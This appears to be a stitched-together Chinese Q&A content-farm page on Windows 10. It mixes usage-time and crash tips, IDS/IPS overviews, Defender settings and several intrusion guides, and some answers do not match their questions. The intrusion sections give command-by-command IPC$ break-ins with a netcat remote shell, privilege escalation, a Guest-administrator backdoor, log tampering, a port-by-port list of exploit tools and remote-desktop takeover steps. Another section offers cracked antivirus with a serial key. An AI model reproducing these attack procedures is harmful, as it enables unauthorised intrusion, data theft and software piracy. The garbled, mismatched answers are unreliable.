win10如何判断电脑被入侵

win10判断电脑使用时间

1.win10怎么查到电脑使用时间

很多windows10系统用户都忘记了自己电脑刚开始的使用时间,可又希望能够更深入地了解自己的电脑,如何操作才能成功查看电脑硬件时间呢?今天小编为大家整理吧win10电脑使用时间查询教程,希望大家喜欢。

鲁大师是你一款非常强大好用的电脑硬件信息管理处理软件,这款软件中的功能等非常的强大,能够很好的帮助用户们去记录每个硬件的使用时间,不知怎么查看的用户,接下来就让我教你win10电脑使用时间查询教程吧。

win10电脑使用时间查询教程:

1、在鲁大师中,点击【硬件信息】,进入该界面中。

win10电脑使用时间查询教程

2、点击【硬件健康】就能够看到大致的使用时间了。

win10电脑使用时间查询教程(1)

3、此上的信息只能够作为大概的参考,不是百分百的准确哦。

2.您好我的系统Win10开机用一段时间以后就会显示:你的电脑遇到某?

利用如下操作进行处理试试: 1、系统分区磁盘查错。

左下角“开始”右键选择“命令提示符(管理员)”,黑窗中键入 chkdsk ?/r ?%systemdrive% 回车,如提示计划下次重启检查此卷?选择“y”,检查将在重启后进行。 时间较长。

2、虚拟内存设置。“此电脑”右键--属性--高级系统设置--高级--性能:设置--高级--更改--自定义大小--初始大小、最大值:2700、5400--设置,一直“确定”,重启电脑。

3、执行360安全卫士:电脑清理、常规修复、优化加速。 4、系统分区磁盘清理、碎片整理。

双击桌面“此电脑”,“磁盘”右键--属性: ①常规--磁盘清理--清理系统文件:磁盘清理,勾选清理选项;其它选项,单击“系统还原。

”框中“清理”,清理多余还原点--确定。

②工具--对驱动器优化和碎片整理--优化:选中磁盘进行。 5、打开360系统急救箱,检测和更新结束后,再分别执行右下角“修复系统设置”、“修复系统文件”,扫描修复。

之后,单击“开始急救”扫描检查。

3.如何看电脑电池使用时间 win10

1、散热不良,CPU应保持良好的通风状况,这很重要。

工作时间太长也会导致。CPU的散热问题,也是电脑故障发生的重要原因。

2、机箱内灰尘过多。请及时清干净,保持内部干燥和清洁。

3、可能是内存条松了、应拔出检查下看看是否损坏。 硬盘老化或使用不当也是原因之一。

4、硬件的问题。比如电脑的重启按钮有问题了,经常接触不良、电源电压不稳、散热问题、内存松动、硬盘都可能导致电脑自动关机。

可以先检查一下电脑重启按钮是都松动、按钮弹性不好或者损坏等。电源不稳的问题,可能是由于劣质电源导致,或者是电源使用年限过长,可以先借用别人的电源来检测一下。

5、内存占用太大, 结束不必要的程序或内存配置低 。6、硬盘故障也会造成电脑自动关机,由于硬盘老化或者使用不当造成坏道、坏扇区,导致电脑在运行时发生死机等故障,可以用专用工具软件来进行排障处理,损坏严重的话就需要更换硬盘了,另外对于在不支持UDMA66/100的主板,要注意CMOS中硬盘运行方式的设定。

7、病毒 下栽查杀软件杀毒。检查一下电脑是否中了病毒,如果是,用杀毒软件查杀直接杀毒即可。

8、垃圾文件过多或碎片文件过多,建议你定期清理一下系统垃圾。也可以还原一下系统,方便容易。

9、查看电脑主板里的电容是否爆裂。更换电容10、系统文件是否被破坏 检查一下是否系统的文件被破坏了,如果是,只要点击开始菜单-附件-命令提示符-以管理员的身份运行程序,再利用chkdsk命令尝试校验并修复即可解决问题。

11、显卡驱动问题检查是否是驱动的问题,如果是,可以通过升级驱动来解决,最好下载一个驱动精灵检测下驱动的问题。麻烦采纳 谢谢。

4.如何看电脑电池使用时间 win10

1、散热不良,CPU应保持良好的通风状况,这很重要。工作时间太长也会导致。CPU的散热问题,也是电脑故障发生的重要原因。

2、机箱内灰尘过多。请及时清干净,保持内部干燥和清洁。

3、可能是内存条松了、应拔出检查下看看是否损坏。 硬盘老化或使用不当也是原因之一。

4、硬件的问题。比如电脑的重启按钮有问题了,经常接触不良、电源电压不稳、散热问题、内存松动、硬盘都可能导致电脑自动关机。可以先检查一下电脑重启按钮是都松动、按钮弹性不好或者损坏等。电源不稳的问题,可能是由于劣质电源导致,或者是电源使用年限过长,可以先借用别人的电源来检测一下。

5、内存占用太大, 结束不必要的程序或内存配置低 。

6、硬盘故障也会造成电脑自动关机,由于硬盘老化或者使用不当造成坏道、坏扇区,导致电脑在运行时发生死机等故障,可以用专用工具软件来进行排障处理,损坏严重的话就需要更换硬盘了,另外对于在不支持UDMA66/100的主板,要注意CMOS中硬盘运行方式的设定。

7、病毒 下栽查杀软件杀毒。

检查一下电脑是否中了病毒,如果是,用杀毒软件查杀直接杀毒即可。

8、垃圾文件过多或碎片文件过多,建议你定期清理一下系统垃圾。也可以还原一下系统,方便容易。

9、查看电脑主板里的电容是否爆裂。

更换电容

10、系统文件是否被破坏

检查一下是否系统的文件被破坏了,如果是,只要点击开始菜单

-附件-命令提示符-以管理员的身份运行程序,再利用chkdsk

命令尝试校验并修复即可解决问题。

11、显卡驱动问题

检查是否是驱动的问题,如果是,可以通过升级驱动来解决,最好下载一个驱动精灵检测下驱动的问题。

麻烦采纳

谢谢

5.win10怎么查看每次开机启动所需的时间

因此想要查看系统的开机用时,可是操作了半天都没有成功。

这该怎么办呢?接下来,小编就向大家分享两种查看Windows10系统开机时间的方法。一、系统自带功能 电脑接通电源到进入Windows界面用时,实际上包括两个方面,一是BIOS所用时间,一是系统启动时间。

所以Win10系统开机所用时间正确的算法是:BIOS启动用时+系统启动用时。 1、查看BIOS启动时间 如下图所示。

打开Win10任务管理器,点击转至“启动”选项卡,我们就会看到“上次BIOS所用时间了”,如笔者计算机BIOS启动时间为7.9秒。 2、查看系统启动时间 这里重点介绍,因为很多朋友认为系统没有这项功能。

第一步、对着Win10桌面此电脑单击鼠标右键,菜单中选择“管理”。 第二步、在计算机管理窗口,依次展开系统工具->事件查看器->Windows日志->系统,点击选中后,找到并点击最右侧窗口重的“查找”。

第三步、在查找窗口,输入查找条件:6013后点击“查找下一个”按钮,在中间窗口,就会显示出系统启动时间了,如笔者计算机为27秒。 温馨提示: Win10系统开机所用时间=BIOS启动用时+系统启动用时=7.9+27=35秒 二、第三方软件方法 这方面软件很多,比如360开机助手、驱动精灵开机助手等,但是这种方法是不推荐使用的,这种做法本身就是一种抱薪救火的方法!因为安装软件本身就会拖慢系统开机时间。

以上就是查看Windows10系统开机时间的两种方法介绍了。

win10判断电脑使用时间

win10如何入侵

1.win10怎么ddos攻击别人

DDOSDDOS的中文名叫分布式拒绝服务攻击,俗称洪水攻击

DDoS攻击概念

DoS的攻击方式有很多种,最基本的DoS攻击就是利用合理的服务请求来占用过多的服务资源,从而使合法用户无法得到服务的响应。

DDoS攻击手段是在传统的DoS攻击基础之上产生的一类攻击方式。单一的DoS攻击一般是采用一对一方式的,当攻击目标CPU速度低、内存小或者网络带宽小等等各项性能指标不高它的效果是明显的。随着计算机与网络技术的发展,计算机的处理能力迅速增长,内存大大增加,同时也出现了千兆级别的网络,这使得DoS攻击的困难程度加大了 - 目标对恶意攻击包的"消化能力"加强了不少,例如你的攻击软件每秒钟可以发送3,000个攻击包,但我的主机与网络带宽每秒钟可以处理10,000个攻击包,这样一来攻击就不会产生什么效果。

2.怎样入侵各个网络端口?

1。

1433端口入侵 scanport。exe 查有1433的机器 SQLScanPass。

exe 进行字典暴破(字典是关键) 最后 SQLTools。exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口 sqlhelloF。 exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功) sqlhelloz。

exe 入侵ip 1433 (这个是正向连接) 2。 4899端口入侵 用4899过滤器。

exe,扫描空口令的机器 3。 3899的入侵 对很早的机器,可以试试3389的溢出(win3389ex。

exe) 对2000的机器,可以试试字典暴破。(tscrack。

exe) 4。 80入侵 对sp3以前的机器,可以用webdav入侵; 对bbs论坛,可以试试上传漏洞(upfile。

exe或dvup_delphi。exe) 可以利用SQL进行注入。

(啊D的注入软件)。 5。

serv-u入侵(21端口) 对5。 004及以下系统,可用溢出入侵。

(serv5004。exe) 对5。

1。0。

0及以下系统,可用本地提升权限。(servlocal。

exe) 对serv-u的MD5加密密码,可以用字典暴破。 (crack。

vbs) 输入一个被serv-u加密的密码(34位长),通过与字典档(dict。txt)的比较,得到密码 6。

554端口 用real554。exe入侵。

3.如何构建一个入门级入侵检测系统?

通常来说,一个企业或机构准备进军此领域时,往往选择从基于网络的IDS入手,因为网上有很多这方面的开放源代码和资料,实现起来比较容易,并且,基于网络的IDS适应能力强。

有了简单网络IDS的开发经验,再向基于主机的IDS、分布式IDS、智能IDS等方面迈进的难度就小了很多。 在此,笔者将以基于网络的IDS为例,介绍典型的IDS开发思路。

根据CIDF规范,我们从功能上将入侵检测系统划分为四个基本部分:数据采集子系统、数据分析子系统、控制台子系统、数据库管理子系统,如附图所示。 具体实现起来,一般都将数据采集子系统(又称探测器)和数据分析子系统在Linux或Unix平台上实现,我们称之为数据采集分析中心;将控制台子系统在Windows NT或2000上实现,数据库管理子系统基于Access或其他功能更强大的数据库,多跟控制台子系统结合在一起,我们称之为控制管理中心。

本文以Linux和Windows NT平台为例介绍数据采集分析中心和控制管理中心的实现。 可以按照如下步骤构建一个基本的入侵检测系统。

第一步 获取libpcap和tcpdump 审计踪迹是IDS的数据来源,而数据采集机制是实现IDS的基础,否则,巧妇难为无米之炊,入侵检测就无从谈起。 数据采集子系统位于IDS的最底层,其主要目的是从网络环境中获取事件,并向其他部分提供事件。

目前比较流行的做法是:使用libpcap和tcpdump,将网卡置于“混杂”模式,捕获某个网段上所有的数据流。 libpcap是Unix或Linux从内核捕获网络数据包的必备工具,它是独立于系统的API接口,为底层网络监控提供了一个可移植的框架,可用于网络统计收集、安全监控、网络调试等应用。

tcpdump是用于网络监控的工具,可能是Unix上最著名的sniffer了,它的实现基于libpcap接口,通过应用布尔表达式打印数据包首部,具体执行过滤转换、包获取和包显示等功能。tcpdump可以帮助我们描述系统的正常行为,并最终识别出那些不正常的行为,当然,它只是有益于收集关于某网段上的数据流(网络流类型、连接等)信息,至于分析网络活动是否正常,那是程序员和管理员所要做的工作。

libpcap和tcpdump在网上广为流传,开发者可以到相关网站下载。 第二步 构建并配置探测器,实现数据采集功能 1。

应根据自己网络的具体情况,选用合适的软件及硬件设备,如果你的网络数据流量很小,用一般的PC机安装Linux即可,如果所监控的网络流量非常大,则需要用一台性能较高的机器。 2。

在Linux服务器上开出一个日志分区,用于采集数据的存储。 3。

创建libpcap库。从网上下载的通常都是libpcap。

tar。z的压缩包,所以,应先将其解压缩、解包,然后执行配置脚本,创建适合于自己系统环境的Makefile,再用make命令创建libpcap库。

libpcap安装完毕之后,将生成一个libpcap库、三个include文件和一个man页面(即用户手册)。 4。

创建tcpdump。与创建libpcap的过程一样,先将压缩包解压缩、解包到与libpcap相同的父目录下,然后配置、安装tcpdump。

如果配置、创建、安装等操作一切正常的话,到这里,系统已经能够收集到网络数据流了。至于如何使用libpcap和tcpdump,还需要参考相关的用户手册。

第三步 建立数据分析模块 网上有一些开放源代码的数据分析软件包,这给我们构建数据分析模块提供了一定的便利条件,但这些“免费的午餐”一般都有很大的局限性,要开发一个真正功能强大、实用的IDS,通常都需要开发者自己动手动脑设计数据分析模块,而这往往也是整个IDS的工作重点。

4.IPS如何实现深度检测和入侵抵御?

随着网络攻击技术的不断提高和网络安全漏洞的不断发现,传统防火墙技术加传统IDS的技术,已经无法应对一些安全威胁。

在这种情况下,IPS技术应运而生,IPS技术可以深度感知并检测流经的数据流量,对恶意报文进行丢弃以阻断攻击,对滥用报文进行限流以保护网络带宽资源。 IPS如何实现深度检测和入侵抵御 对于部署在数据转发路径上的IPS,可以根据预先设定的安全策略,对流经的每个报文进行深度检测(协议分析跟踪、特征匹配、流量统计分析、事件关联分析等),如果一旦发现隐藏于其中网络攻击,可以根据该攻击的威胁级别立即采取抵御措施,这些措施包括(按照处理力度):向管理中心告警;丢弃该报文;切断此次应用会话;切断此次TCP连接。

在哪里部署 进行了以上分析以后,我们可以得出结论,办公网中,至少需要在以下区域部署IPS,即办公网与外部网络的连接部位(入口/出口);重要服务器集群前端;办公网内部接入层。至于其它区域,可以根据实际情况与重要程度,酌情部署。

如何部署 在以下案例中,我们可以看到以IPS为核心的多种网络深度检测/实时抵御的方案;不同的方案,在不同的应用场景当中,可以适当地扩充或简化。 一、基于策略的安全防御 1。

位于办公网入口的IPS通过应用层协议分析跟踪和特征匹配,发现目的地为业务服务器A的HTTP数据流中隐藏有针对Windows操作系统的DCOM漏洞的恶意利用; 2。 IPS将此安全事件上报至管理中心; 3。

管理中心获取服务器A的基本信息; 4。 管理中心根据获取的A的信息,判断该访问是否会造成危害,如果A不运行Windows操作系统或者A确实运行Windows但是已经打了针对DCOM漏洞的补丁,则A是安全的; 5。

根据情况,管理中心向IPS下发制定的安全策略; 6。 IPS执行安全策略,放行或者阻断此次连接请求。

事实上,在这里我们描述的是需要管理中心介入的情况,在一些相对简单的情况下,如果我们事先可以确认服务器集群所运行的操作系统(在90%的情况下这是可能的),那么抵御该网络攻击的规则可以直接施加在IPS上,不再需要与管理中心的交互,从而降低部署的复杂度、提高效率。 二、应用感知的智能防御 1。

办公网用户访问Internet上的WWW服务器; 2。 IPS检测到该请求,判断该请求符合事先设定的安全策略,放行; 3。

该用户与外部服务器的连接建立; 4。 该用户试图通过已经建立的连接,利用二次代理,发起对某非法或不良网站的访问请求; 5。

根据对应用层协议的深度分析和内容识别,IPS检测到该企图,阻断该次HTTP连接; 6。 上报该安全事件到管理中心备查; 7。

IPS可以根据管理中下发的策略,对该用户进行一定时间的惩罚(拒绝该用户后续的上网请求)。 三、行为分析的智能防御,阻止病毒、蠕虫泛滥 1。

某办公网用户通过公共区域网络访问业务服务器集群; 2。 正常连接建立后,位于服务器集群前端的IPS检测到来自该用户的通信流量中隐藏有某种病毒的行为特征,立即阻断该用户的此次访问,并且上报该安全事件给管理中心; 3。

管理中心分析该安全事件,根据报文信息定位到该用户,并且制定新的安全策略; 4。 接入管理更改该用户的安全等级,下发更新的安全策略给相关网络设备; 5。

更新了安全策略的网络设备将该用户隔离至某特定区域,避免该病毒感染其他网络用户,并采取后续行动。 IPS深度检测与入侵抵御的关键技术 高性能、高可靠性的硬件平台 依赖于对网络设备体系架构的深刻理解和强大的设计开发能力,华为3Com为IPS产品设计了专用的高性能硬件平台。

该平台彻底抛弃了目前市面上常见的工控机架构。 协议分析与跟踪技术 通过前面的分析,我们可以看到协议分析与跟踪对IPS设备的重要性。

与传统防火墙不同的是,IPS不但要分析和跟踪IP、ICMP、UDP、TCP这几种网络层、传输层的协议,而且,还要对HTTP、HTTPS、FTP、TFTP、SNMP、Telnet、SMTP、POP、DNS、RPC、LDAP、ICQ、MSN、Yahoo Messenger等众多的应用层协议进行分析、跟踪。 没有对网络协议和操作系统的深刻理解,要完成这件工作是不可能的。

华为3Com已经具备了在操作系统的内核级别对应用协议进行全面跟踪、深度分析的实力;而且,在引入网络处理器后,所有的逻辑检测和协议分析、跟踪都要下移到网络处理器中,采用微码实现,进一步提高系统性能。 特征匹配的性能 从海量的数据中去寻找一定的特征,在计算领域,这历来是一个高计算量、高复杂度的问题;而IPS的报文内容识别,恰恰要基于此工作。

那么,如何解决这个CPU杀手和提高设备性能之间的矛盾呢? 华为3Com采用专用的硬件加速卡来解决这个问题。 基于专门的内容查找芯片设计的硬件加速卡在系统中与CPU、网络处理器协同工作,在需要对报文进行内容搜索的情况下,为CPU和网络处理器卸载负担,使得CPU和网络处理器可以专注于报文处理和逻辑检测,从而将内容搜索对系统效率的影响降至最低。

目前华为3Com设计的硬件加速卡,可以在千兆的环境下线速地处理流量。

5.Win10如何开启WindowsDefender漏洞防护呢

第1步:给予通过权在搜索框中搜索Windows Defender安全中心,并在应用程序打开后,单击病毒和威胁保护框。

进入后,点击病毒和威胁防护设置。 向下滚动,直到看到受控文件夹访问选项并打开开关。

第2步:添加重要文件夹完成之后,点击保护文件夹的链接。 默认情况下,大多数常用文件夹(如桌面,图片和文档)应该已经列出。

但是,如果您愿意,您可以添加您认为重要的文件夹。 第3步:添加您的可信应用程序下一步是指定几个应用程序到受信任的应用程序列表。

点击允许通过受控文件夹访问的应用程序并添加程序的exe文件。 而已! 设置完成。

6.入侵电脑的方法,尽可能多的方法

IPC入侵攻略!其实针对IPC漏洞入侵的方法目前已经有很多的教程,但是其中很多教程并不完整,所以还是有很多网友来信问我关于IPC漏洞入侵的有关问题,这就是我写这篇文章的原因了。

如果你觉得本文也不完整,那只好去找更好的版本了,但是我希望你能把你的意见和建议告诉我,让我不断的完善这篇文章。本文参考了小榕的流光2000说明文档及其它相关文档,也包含了一些自己的心得体会。

本文欢迎非商业性转载,但请保持文章完整性并注明出处!:-) IPC是Internet Process Connection的缩写,也就是远程网络连接。它是Windows NT及Windows 2000特有的一项功能,特点是在同一时间内,两个IP之间只允许建立一个连接。

好了,废话少说,现在进入主题。 如何找到具有IPC漏洞的主机呢?以前我都是组合一个国外的扫描工具(名字我忘了)和KillUSA的LetMeIn,因为很多工作都是手工完成的,所以速度可想而知了。

现在因为有了小榕的流光2000,所以找到这样的主机实在是太简单了,具体操作我就不说了,大家可以参考该软件的说明文档。 好了,假设我们已经找到了一台这样的主机,地址是139.223.200.xxx,管理员帐号是Administrator,密码是123456。

进入命令行方式,正式开工。需要说明的是,以下操作都是在目标主机没有禁止远程IPC$连接和启动Schedule服务的理想情况下进行的。

F:\》net use \\139.223.200.xxx\ipc$ "123456" /user:"Administrator" 命令成功完成。 F:\》copy nc.exe \\139.223.200.xxx\admin$ 已复制 1 个文件。

F:\》net time \\139.223.200.xxx \\139.223.200.xxx 的当前时间是 2000/12/25 上午 10:25 在 \\139.223.200.xxx 的本地时间 (GMT - 07:00) 是 2000/12/25 上午10:35 命令成功完成。 F:\》at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe 新增加了一项作业,其作业 ID = 0 F:\》telnet 139.223.200.xxx 1234 上面的命令很简单,你只要参考一下net,at和nc的用法就可以了。

这样,我们就登上了远程的主机。最理想的情况是这样的,但是,也许你会遇到目标主机的Schedule服务没有启动的情况,那么,at命令就不能用了,我们就需要增加以下步骤。

F:\》at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe 服务仍未启动。 F:\》netsvc \\139.223.200.xxx schedule /start Service is running on \\139.223.200.xxx 登上远程主机之后,我们可以做什么呢?这要视这个帐号的权限以及该主机的安全策略来决定。

如果你的权限不够的话,可以试试下面的步骤。首先在本地执行下面的命令。

F:\》copy getadmin.exe \\139.223.200.xxx\admin$ 已复制 1 个文件。 F:\》copy gasys.dll \\139.223.200.xxx\admin$ 已复制 1 个文件。

其次,在远程主机运行下面的命令。 C:\WINNT\system32》getadmin 如果成功的话,你就是这台主机的管理员了,权限够大了吧?:-) 那么,现在我们能做什么呢?改主页?下载SAM数据库?都可以啦!方法有很多,我就不一一说了,具体方法可以参考相关教程。

我一般对目标主机上的WORD文档和数据库比较感兴趣,呵呵。

其实,如果你在这台机子上面放个木马或者病毒什么的东东,做起事来更容易一些,但是我觉得如果你跟他没什么深仇大恨的话,还是不要这么做了,这样不好。

作完了你要做的事,不要忘了做个后门。 C:\WINNT\system32》net user Guest 30906766 net use Guest 30906766 The command completed successfully. C:\WINNT\system32》net localgroup administrators Guest /add net localgroup administrators Guest /add The command completed successfully. 这是个比较简单的后门,要想做的更好一些,可以象Linux那样,做出一套RootKits来,其实这样的东东目前已经有了,你只要拿来用就可以了。

现在搞破坏真是简单多了,那么多的傻瓜工具任你用,哎!要想自保,不学点安全知识怎么行呢? 最后,我们得修理一下日志。虽然Redp0wer告诉我很少管理员会看NT的日志,但是我想修理一下还是有用的。

NT的日志在什么地方呢?可以参考XUDI的文章。但是有一点要记住的是,日志只能修改,不能删除,否则就是自己把自己出卖了!:-)这方面的命令行工具也不少,你可以到一些国外的站点去看看。

7.怎么通过端口进行入侵

希望对新手入侵有帮助! 1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键) 最后 SQLTools.exe入侵 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功) sqlhelloz.exe 入侵ip 1433 (这个是正向连接) 2. 4899端口入侵 用4899过滤器.exe,扫描空口令的机器 3. 3899的入侵 对很早的机器,可以试试3389的溢出(win3389ex.exe) 对2000的机器,可以试试字典暴破。(tscrack.exe) 4. 80入侵 对sp3以前的机器,可以用webdav入侵; 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) 可以利用SQL进行注入。

(啊D的注入软件)。 5. serv-u入侵(21端口) 对5. 004及以下系统,可用溢出入侵。

(serv5004.exe) 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) 对serv-u的MD5加密密码,可以用字典暴破。

(crack.vbs) 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码 6. 554端口 用real554.exe入侵。 7. 6129端口 用DameWare6129.exe入侵。

8. 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 9. 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。

(可用mydoomscan.exe查)。 10. 其他入侵 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。

经典IPC$入侵 1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators" 这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连 接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名 ,输入administrators,命令即可成功完成。 2. C:\>copy srv.exe $">\\127.0.0.1\admin$ 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的 c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。

3. C:\>net time \\127.0.0.1 查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。 4. C:\>at \\127.0.0.1 11:05 srv.exe 用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊. 5. C:\>net time \\127.0.0.1 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备 开始下面的命令。

6. C:\>telnet 127.0.0.1 99 这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的 是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打 算建立一个Telnet服务!这就要用到ntlm了 7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$ 用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。 8. C:\WINNT\system32>ntlm 输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这 个程序在对方计算机上运行)。

当出现"DONE"的时候,就说明已经启动正常。然后使 用"net start telnet"来开启Telnet服务! 9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作 一样简单!(然后你想做什么?想做什么就做什么吧,哈哈) 为了以防万一,我们再把guest激活加到管理组 10. C:\>net user guest /active:yes 将对方的Guest用户激活 11. C:\>net user guest 1234 将Guest的密码改为1234,或者你要设定的密码 12. C:\>net localgroup administrators guest /add 将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我 们可以用guest再次访问这台计算机) 工具可以从诉说技术论坛或者独特技术论坛下。

(刚开的现阶段不要钱,随便下注册以后)。

8.怎么入侵电脑

入侵电脑可能涉嫌“破坏计算机信息系统罪”

以下是《刑法》中关于“破坏计算机信息系统罪”的构成要件和量刑。

(2)构成要件

刑法第286条规定的破坏计算机信息系统罪,是指违反国家规定,对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常进行;或者对计算机系统存储、处理或者传输的数据进行删除、修改、增加的操作;或者故意制作、传播计算机病毒等破坏性程序,影响计算机和应用程序系统正常运行,后果严重的行为。

本罪的构成要件是:

第一,侵犯的客体,是计算机信息系统的正常运行秩序。

第二,在客观方面,表现为:一是实施了下列3种行为中的一种或者多种:违反国家规定,对计算机信息系统功能进行删除、修改、增加、干扰;或者对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作;或者故意制作、传播计算机病毒的破坏性程序。二是造成了计算机系统不能正常运行,后果严重的危害结果。

第三,本罪的主体是一般主体。

第四,主观方面是故意。

(3)要注意划清本罪的罪与非罪、此罪与彼罪的界限

第一,要划清本罪的罪与非罪的界限。在本罪中,“后果严重”,是构成本罪的要件。这主要是严重影响计算机系统正常运行;影响计算机系统正常运行造成严重经济损失;影响计算机系统正常运行造成其他严重后果。

第二,要划清本罪与刑法第285条规定的非法侵入计算机信息系统罪的界限。这两者的区别是:一是在客观方面,本罪表现为对计算机信息系统进行非法操作,例如删除、修改、增加等等;而侵入计算机信息系统罪则单纯表现为侵入行为。二是从刑法理论上看,本罪表现为“结果犯”;而侵入计算机信息系统罪表现为“行为犯”

(4)刑罚及量刑幅度

根据刑法第286条规定,犯本罪的,判处5年以下有期徒刑或者拘役;后果特别严重的,判处5年以上有期徒刑

9.如何实现远程桌面的入侵

下面将以WindowsXP为例,讲解如何实现远程桌面的入侵。

步骤1:在进行入侵之前,先让我们来对WindowsXP计算机进行端口扫描,这样可以看到本课中执行的操作效果。在扫描结果中可以看到这台计算机并没有开放3389端口。

步骤2:接着,使用木马程序在WindowsXP中添 加超级帐户。在帐户创建成功后,我们不能在“计算机管理”窗口中看到新建的帐户。

步骤3:我们只能在“命令提示符”窗口中看到123这个帐户已经创建成功了,如图所示。 步骤4:此时,即可在“命令提示符”窗口中,使用NetUse命令与WindowsXP计算机进行连接了。

步骤5:接着,可以使用如图所示的命令,将远程WindowsXP计算机中的C盘映射到本机中。 步骤6:在“我的电脑”窗口中双击远程WindowsXP计算机中的C盘后,将从“”中下载的开启3389小程序复制进去。

步骤7:此时,可以使用“NettimeW192.168.1.233”命令获得远程计算机的时间,如图所示。 步骤8:接着,使用命令UAT192.168.1.823:40C:opents.exe”设置复制的开启3389的程序何 时运行,如图所示。

步骤9:在等待指定的时间一过后,就可以使用扫描软件对WindowsXP计算机进行端口扫描了。 步骤10:此时,如果在ghost xp sp3系统计算机的“命令提示符”窗口中,使用“Netstat-an”命令查看端口时,可以看到3389端口已经开放了,如图所示。

在“我的电脑”属性窗口中,在“远程”选项卡界面中可以看到“允许用户远程连接到此计算机”项已经自动处于选中状态了,如图所示。 步骤11:此时,就可以使用创建的隐藏帐户以及开放的3389功能在图形界面下登录WindowsXP计算机。

但是,由于WindowsXP同一时间只允许一台计算机登录,所以还需要将从“”中下载的让WindowsXP支持2个用户登录的工具复制到映射的C盘分区,并使用AT命令运行它,如图所示。 步骤12:在等待程序运行后WindowsXP计算机突然重启后,即可在远程使用“远程桌面”功能进行登录了,如图所示。

在完成登录操作后,即可在窗口中对远程计算机进行桌面环境的操作了。

win10如何入侵

入侵别人win10系统电脑

1.win10怎么共享别人的电脑

1.双击Win10系统桌面上的这台电脑,找到要共享的文件夹。

2.右键要共享的文件夹,将鼠标移动到“共享“上,点击特定用户。

3.点击后,弹出文件共享窗口,点击下面的向下箭头,可以打开下拉共享用列表。

4.选择要共享的用户,点击添加。

5.点击后,共享的用户就可以在底下的方框里看到。

---

1.双击Win10系统桌面上的这台电脑,找到要共享的文件夹。

2.右键要共享的文件夹,将鼠标移动到“共享“上,点击特定用户。

3.点击后,弹出文件共享窗口,点击下面的向下箭头,可以打开下拉共享用列表。

4.选择要共享的用户,点击添加。

5.点击后,共享的用户就可以在底下的方框里看到。

6.需要服务

计算机(我的电脑)图标右键-----管理---服务,或开始→控制面板→系统和安全→管理工具-服务设置下面服务为自动启动并启动

print spooler

server

workstation

SSDP Discovery

win10 smb1如何开启?Win10开启SMB 1.0解决共享问题;

控制面板,选择查看方式为小图标,然后点击程序和功能;

勾选SMB 1.0/CIFS File Sharing Support 选项,确定;

安装完SMB 1.0支持之后重启一下电脑;

2.有人侵入我的电脑怎么办前天晚上有人侵入我的电脑从此就有噩梦电脑

金山毒霸 2006 完美破解可升级 安装组合版 第三版 金山毒霸自全面实行互联网战略以来,截至目前为止,全球至少有1800万用户在使用金山毒霸,并且这一数字正以每天新增5万用户的速度持续增长。

金山毒霸最新版本《金山毒霸2006杀毒套装》含防杀病毒、防杀间谍软件、隐私保护、防黑客和木马入侵、防网络钓鱼、文件粉碎器、抢先加载、垃圾邮件过滤、主动漏洞修复、安全助手等功能,配合主动实时升级技术、按月更新功能以及每周至少17次升级病毒库(包括非工作日),全面防护您的电脑安全! 金山毒霸已经不单是一款杀毒软件,而是一款可防止更多网络威胁的互联网安全软件! 金山网镖的序列号106500-010802-710731-996656 如果真的不会在线升级的。 51ct每隔N天会放出离线病毒库的,不过其实在线升级很简单的哈~ 金山这几天做了一些小动作 在你更新结束后自动下载原版的Update。

EXE覆盖你的破解版的Update。EXE 所以就不能自动更新了 其实也没有什么含金量的样子~~ So。

我用autoit创建了一个进程监视升级 发现金山替换的时候再反替换的样子。 使用方法也一样 覆盖c盘的kav2006文件夹 必须安装默认目录 相关程序:51ct。

exe(第二版的破解Update。EXE) Update。

EXE(用来启动51ct。 exe和1。

exe) 1。exe(监视升级过程并替换金山升级后的原版Update。

EXE) 如果不能升级联系我, ,注明新浪爱问。

3.如何入侵别人的电脑系统

侵入他人计算机是刑法犯罪,不会有人教你的,因为教人犯罪也是犯罪行为。

违反刑法第二百八十五条第二款和第三款。

法律条文:

刑法第二百八十五条第二款、第三款:“违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。

